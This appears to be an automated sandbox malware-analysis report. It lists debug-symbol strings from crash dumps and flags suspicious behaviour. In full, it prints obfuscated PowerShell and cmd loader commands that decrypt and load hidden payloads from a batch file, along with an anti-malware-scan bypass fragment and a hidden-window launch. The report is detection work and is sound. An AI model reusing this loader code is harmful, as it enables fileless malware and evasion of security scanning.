Source: Binary string: System.Drawing.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Core.pdb`- source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.pdbP< source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.pdbh source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Core.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Numerics.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.ServiceProcess.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Numerics.pdbP source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Xml.pdbP4 source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.pdbMicrosoft.PowerShell.Commands.Utility.dllH source: WER8C9.tmp.dmp.27.dr
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb@y' source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Xml.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Management.pdb`*?@_*? source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Configuration.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.Install.pdbH source: WER6AC3.tmp.dmp.11.dr
Source: Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Data.ni.pdbRSDSC source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Data.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Configuration.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Xml.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbcache source: svchost.exe, 00000030.00000000.2811892265.000002259585D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3403906582.000002259585D000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Data.pdbH source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Windows.Forms.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: 7\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: mscorlib.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.pdbpl source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Management.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Drawing.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Management.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdbH source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Core.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.DirectoryServices.pdbx*? source: WER8C9.tmp.dmp.27.dr
Source: Binary string: System.Transactions.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Transactions.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000000.2811717839.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000030.00000000.2811800023.0000022595840000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3402915190.0000022595840000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Numerics.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.3402005843.000002259582B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ni.pdb source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER8C9.tmp.dmp.27.dr, WER6AC3.tmp.dmp.11.dr

Data Obfuscation
barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer($HcKZyefBJpvKrT,$DyGxdRsDFLitOyBSDtJ).Invoke(''+[Char](97)+''+'m'+''+'s'+''+'i'+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'');$IPJIfzrUhQjJlmTUH=$YOhLAkBIOfDYUh.Invoke(
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+'a'+[Char](11
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+'T'+'W'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+'r'+''+[Char](98)+''+[Char](120)+''+[Char](45)+'s'+
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:thuUFdhjXkHq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yFLwIFejWheBPy,[Parameter(Position=1)][Type]$NxINIPbKxv)$yMLVqpDcpHk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+'s'+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$yMLVqpDcpHk.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,'+'H'+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+','+''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'me,M'+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+'e'+'d');$yMLVqpDcpHk.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+'k'+[Char](101)+'',''+'P'+''+'u'+''+'b'+'li'+'c'+''+','+''+'H'+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+','+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'',$NxINIPbKxv,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+'unt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+'a'+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $yMLVqpDcpHk.CreateType();}$tBOzPEeXdclpo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+''+'m'+''+'.'+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+'icr'+'o'+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+'n'+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+'af'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+'i'+''+'v'+''+'e'+'Met'+[Char](104)+''+'o'+''+[C
Suspicious command line found
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object 